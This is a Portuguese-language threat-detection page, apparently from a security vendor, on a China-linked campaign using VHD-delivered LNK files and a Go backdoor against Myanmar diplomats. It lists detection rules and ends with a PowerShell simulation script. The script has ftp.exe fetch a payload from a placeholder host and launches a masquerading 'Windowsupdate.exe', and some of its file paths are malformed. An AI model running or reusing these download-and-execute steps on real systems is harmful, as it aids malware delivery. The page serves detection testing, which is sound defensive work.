Ator com Conexão à China Usa Arquivos VHD para Alvejar Diplomatas de Mianmar
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Um ator de ameaça com vínculo à China está visando pessoal do governo de Mianmar através de uma cadeia de infecção em várias etapas entregue via arquivos de Disco Rígido Virtual (VHD). A campanha usa arquivos LNK maliciosos para abusar ftp.exe para reconstrução de payload e implanta um backdoor personalizado baseado em Go conhecido como QUICAgent. O malware depende de Cloudflare Workers para resolução dinâmica de C2 e se comunica pelo protocolo QUIC.
Investigação
A equipe APT da Seqrite analisou amostras de VHD contendo documentos isca e identificou arquivos LNK maliciosos disfarçados como arquivos PDF. A investigação revelou uma técnica de carga útil dividida na qual dois arquivos são combinados com o comando copy para reconstruir um executável. A análise técnica do implante QUICAgent também revelou evasão de sandbox através de repetidas operações de hash SHA-256 e validação personalizada de certificado TLS.
Mitigação
As organizações devem restringir a execução de arquivos LNK não confiáveis e monitorar processos filhos suspeitos envolvendo ftp.exe. Controles rigorosos em torno do uso de Disco Rígido Virtual (VHD) e monitoramento de tráfego de rede incomum sobre a porta UDP 443 usando QUIC são recomendados. Bloquear endpoints maliciosos conhecidos do Cloudflare Worker também pode interromper o mecanismo de resolução de C2 da campanha.
Resposta
Se atividade QUICSILVER for detectada, os sistemas afetados devem ser isolados imediatamente para interromper a exfiltração de dados e a comunicação com C2. Os investigadores devem inspecionar %LOCALAPPDATA% em busca do binário Windowsupdate.exe e revisar a pasta de Inicialização do usuário para SystemIn.lnk. Logs de rede também devem ser analisados para conexões com domínios e endereços IP C2 conhecidos para determinar o escopo do comprometimento.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Possível Arquivo LNK Malicioso com Extensão Dupla (via linha de comando)
Possível Arquivo Malicioso com Extensão Dupla (via criação de processo)
Possível Operação Manual ou de Script Realizada em Pastas Incomuns (via linha de comando)
LOLBAS ftp (via linha de comando)
Binário / Scripts Suspeitos em Local de Inicialização Automática (via evento de arquivo)
Execução Suspeita de Drive Montado (via auditoria)
Possível Abuso de Domínio de Desenvolvimento do Cloudflare (via DNS)
IOCs (HashSha256) para detectar: Operação QUICSILVER: Ator com Vínculo à China Alvo Diplomatas de Mianmar via Backdoor Entregue pelo VHD
IOCs (SourceIP) para detectar: Operação QUICSILVER: Ator com Vínculo à China Alvo Diplomatas de Mianmar via Backdoor Entregue pelo VHD
IOCs (DestinationIP) para detectar: Operação QUICSILVER: Ator com Vínculo à China Alvo Diplomatas de Mianmar via Backdoor Entregue pelo VHD
Detecção de Comunicação C2 do QUICAgent [Conexão de Rede do Windows]
Uso Suspeito de ftp.exe e Windowsupdate.exe para Execução de Malware [Criação de Processo do Windows]
Execução de Simulação
Pré-requisito: O Check Pre-flight de Telemetria & Baseline deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa de Ataque & Comandos: Um adversário visa estabelecer um ponto de apoio imitando processos legítimos do sistema. Primeiro, ele usa
ftp.execom um arquivo de script (-s:) para baixar um payload malicioso, tentando se misturar com tarefas administrativas automatizadas. Simultaneamente, eles simulam a implantação de um binário “Windows Update” (renomeado) para mascarar a execução do payload. Finalmente, eles usam um script PowerShell projetado para criar um.lnkarquivo malicioso para garantir persistência através da interação do usuário. -
Script de Teste de Regressão:
# 1. Simular download baseado em script FTP (Disparo 1 Parte A) $ftpScript = "open ftp.example.com`nuser anonymous anonymous`nget payload.exe`nquit" $ftpScript | Out-File -FilePath "$env:TEMPftp_script.txt" -Encoding ASCII Start-Process "ftp.exe" -ArgumentList "-s:$env:TEMPftp_script.txt" -Wait # 2. Simular execução do Windowsupdate.exe (Disparo 1 Parte B) # Nota: Isso assume que um arquivo chamado Windowsupdate.exe existe ou está sendo chamado # Para simulação, criaremos um arquivo fictício e executá-lo-emos New-Item -Path "$env:TEMPWindowsupdate.exe" -ItemType File -Force Start-Process "$env:TEMPWindowsupdate.exe" # 3. Simular criação de LNK PowerShell (Disparo 2) Start-Process "powershell.exe" -ArgumentList "-Command", "Write-Output 'create_lnk_process_running'" -
Comandos de Limpeza:
# Remover artefatos simulados Remove-Item -Path "$env:TEMPftp_script.txt" -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPWindowsupdate.exe" -ErrorAction SilentlyContinue